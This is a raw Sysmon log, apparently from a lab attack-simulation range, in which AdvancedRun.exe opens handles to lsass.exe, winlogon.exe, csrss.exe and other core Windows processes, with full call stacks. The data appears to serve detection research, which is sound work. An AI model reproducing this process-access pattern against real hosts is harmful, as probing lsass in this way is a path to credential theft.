\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077837Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077836Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077835Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077834Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077833Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077832Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077831Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077830Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.038{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004077829Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.038{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004077828Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.037{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077817Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.913{834264DD-DB11-61EA-9500-000000002702}4283620C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077816Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.913{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077815Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.913{834264DD-DB11-61EA-9500-000000002702}4283620C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077814Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.913{834264DD-DB11-61EA-9500-000000002702}4283620C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077813Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.912{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077812Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.912{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077809Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.911{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077808Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.906{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077807Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.906{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077806Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.903{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 